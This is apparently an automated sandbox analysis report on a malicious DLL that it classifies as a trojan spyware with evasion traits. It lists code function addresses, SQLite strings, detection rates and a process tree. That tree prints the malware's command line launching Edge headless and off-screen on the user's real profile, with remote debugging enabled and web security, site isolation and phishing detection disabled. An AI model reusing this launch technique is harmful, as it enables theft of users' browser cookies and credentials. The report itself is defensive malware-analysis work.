            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB98039014_2_00007FFDFB980390
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB9203D014_2_00007FFDFB9203D0
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB9843D014_2_00007FFDFB9843D0
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFBA0C3A014_2_00007FFDFBA0C3A0
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB9FE3B014_2_00007FFDFB9FE3B0
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFBA6F3A814_2_00007FFDFBA6F3A8
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB9F02E014_2_00007FFDFB9F02E0
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB99634014_2_00007FFDFB996340
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB93532314_2_00007FFDFB935323
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB9F132014_2_00007FFDFB9F1320
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB93326014_2_00007FFDFB933260
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFBA5121014_2_00007FFDFBA51210
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB94021014_2_00007FFDFB940210
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB9C621014_2_00007FFDFB9C6210
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB97E1E014_2_00007FFDFB97E1E0
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB9511F014_2_00007FFDFB9511F0
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB99C22014_2_00007FFDFB99C220
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB9ED19014_2_00007FFDFB9ED190
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB9E017B14_2_00007FFDFB9E017B
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB9701C014_2_00007FFDFB9701C0
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB9281A014_2_00007FFDFB9281A0
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB96C10014_2_00007FFDFB96C100
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB9F60E014_2_00007FFDFB9F60E0
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB9A414014_2_00007FFDFB9A4140
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB95912014_2_00007FFDFB959120
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB95413014_2_00007FFDFB954130
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFBA1D0D014_2_00007FFDFBA1D0D0
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB9800D014_2_00007FFDFB9800D0
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB9170B014_2_00007FFDFB9170B0
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB95E81014_2_00007FFDFB95E810
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB9E581014_2_00007FFDFB9E5810
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB9CD81014_2_00007FFDFB9CD810
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB93A7F014_2_00007FFDFB93A7F0
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB93D7F014_2_00007FFDFB93D7F0
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB9897F014_2_00007FFDFB9897F0
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFBA057F014_2_00007FFDFBA057F0
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFBA4883014_2_00007FFDFBA48830
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB95D83014_2_00007FFDFB95D830
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB97B76014_2_00007FFDFB97B760
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB99E77014_2_00007FFDFB99E770
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB9D477014_2_00007FFDFB9D4770
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB9FB7D014_2_00007FFDFB9FB7D0
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB96A7A014_2_00007FFDFB96A7A0
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB99D6E014_2_00007FFDFB99D6E0
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB9936E014_2_00007FFDFB9936E0
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB91A74614_2_00007FFDFB91A746
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB9D669014_2_00007FFDFB9D6690
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB95766014_2_00007FFDFB957660
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB99B66014_2_00007FFDFB99B660
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB9846C014_2_00007FFDFB9846C0
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFBA286B014_2_00007FFDFBA286B0
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB9796B014_2_00007FFDFB9796B0
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB9CB6B014_2_00007FFDFB9CB6B0
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB91A61014_2_00007FFDFB91A610
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB9B361214_2_00007FFDFB9B3612
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB9F65F014_2_00007FFDFB9F65F0
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB97C65014_2_00007FFDFB97C650
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB93562414_2_00007FFDFB935624
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB9D363014_2_00007FFDFB9D3630
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB97857014_2_00007FFDFB978570
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB95457014_2_00007FFDFB954570
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB93F5A014_2_00007FFDFB93F5A0
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB9825A014_2_00007FFDFB9825A0
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFBA4051014_2_00007FFDFBA40510
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFBA4154014_2_00007FFDFBA41540
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB93A53014_2_00007FFDFB93A530
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB91153014_2_00007FFDFB911530
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFBA4949014_2_00007FFDFBA49490
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB9C947014_2_00007FFDFB9C9470
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB9EE4A014_2_00007FFDFB9EE4A0
            Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFDFB9D24B014_2_00007FFDFB9D24B0
            Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFDFBA01F90 appears 31 times
            Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFDFB9D8EA0 appears 206 times
            Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFDFB924970 appears 110 times
            Source: C:\Windows\System32\rundll32.exeCode function: String function: 00007FFDFB938730 appears 306 times
            Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7616 -s 412
            Source: classification engineClassification label: mal84.troj.spyw.evad.winDLL@58/20@4/4
            Source: C:\Windows\System32\rundll32.exeFile created: C:\Users\Public\Documents\638724355328959811Jump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6832:120:WilError_03
            Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7832
            Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7616
            Source: C:\Windows\System32\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\tmpww2sdj.tmpJump to behavior
            Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\mP8rzGD7fG.dll,AddNumbers
            Source: rundll32.exe, 00000003.00000002.3145159766.00007FFE11744000.00000002.00000001.01000000.0000000C.sdmp, rundll32.exe, 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmp, rundll32.exe, 0000000E.00000002.2592449610.000002C433C00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
            Source: rundll32.exe, rundll32.exe, 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmp, rundll32.exe, 0000000E.00000002.2592449610.000002C433C00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
            Source: rundll32.exe, rundll32.exe, 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmp, rundll32.exe, 0000000E.00000002.2592449610.000002C433C00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
            Source: rundll32.exe, rundll32.exe, 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmp, rundll32.exe, 0000000E.00000002.2592449610.000002C433C00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
            Source: rundll32.exe, rundll32.exe, 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmp, rundll32.exe, 0000000E.00000002.2592449610.000002C433C00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
            Source: rundll32.exe, rundll32.exe, 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmp, rundll32.exe, 0000000E.00000002.2592449610.000002C433C00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
            Source: rundll32.exe, rundll32.exe, 0000000E.00000002.2595520854.00007FFDFBA74000.00000002.00000001.01000000.0000000C.sdmp, rundll32.exe, 0000000E.00000002.2592449610.000002C433C00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
            Source: mP8rzGD7fG.dllVirustotal: Detection: 33%
            Source: mP8rzGD7fG.dllReversingLabs: Detection: 47%
            Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\mP8rzGD7fG.dll"
            Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\mP8rzGD7fG.dll",#1
            Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\mP8rzGD7fG.dll,AddNumbers
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\mP8rzGD7fG.dll",#1
            Source: C:\Windows\System32\rundll32.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9309 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless
            Source: C:\Windows\System32\rundll32.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9991 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1520 --field-trial-handle=1500,i,9890186816149597539,11445184587505823433,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1484 --field-trial-handle=1428,i,15056660553952727470,9252583371032052914,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3
            Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\mP8rzGD7fG.dll,DotNetRuntimeDebugHeader
            Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7616 -s 412
            Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\mP8rzGD7fG.dll",AddNumbers
            Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\mP8rzGD7fG.dll",DotNetRuntimeDebugHeader
            Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7832 -s 420
            Source: C:\Windows\System32\rundll32.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9268 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1584 --field-trial-handle=1428,i,17945505886261408641,13113547458028761816,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3
            Source: C:\Windows\System32\rundll32.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9231 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1512 --field-trial-handle=1404,i,8570248948414789044,17269091163832771516,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3
            Source: C:\Windows\System32\rundll32.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9582 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1580 --field-trial-handle=1496,i,17156741464264009395,10585309956267009794,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3
            Source: C:\Windows\System32\rundll32.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9694 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1504 --field-trial-handle=1404,i,7222753251508312572,843562090488949947,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3
            Source: C:\Windows\System32\rundll32.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9487 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1660 --field-trial-handle=1472,i,14150613680771438782,17375092338205965150,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3
            Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\mP8rzGD7fG.dll",#1Jump to behavior
            Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\mP8rzGD7fG.dll,AddNumbersJump to behavior
            Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\mP8rzGD7fG.dll,DotNetRuntimeDebugHeaderJump to behavior
            Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\mP8rzGD7fG.dll",AddNumbersJump to behavior
            Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\mP8rzGD7fG.dll",DotNetRuntimeDebugHeaderJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\mP8rzGD7fG.dll",#1Jump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9991 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headlessJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9694 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headlessJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9487 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headlessJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9309 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headlessJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1520 --field-trial-handle=1500,i,9890186816149597539,11445184587505823433,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3Jump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
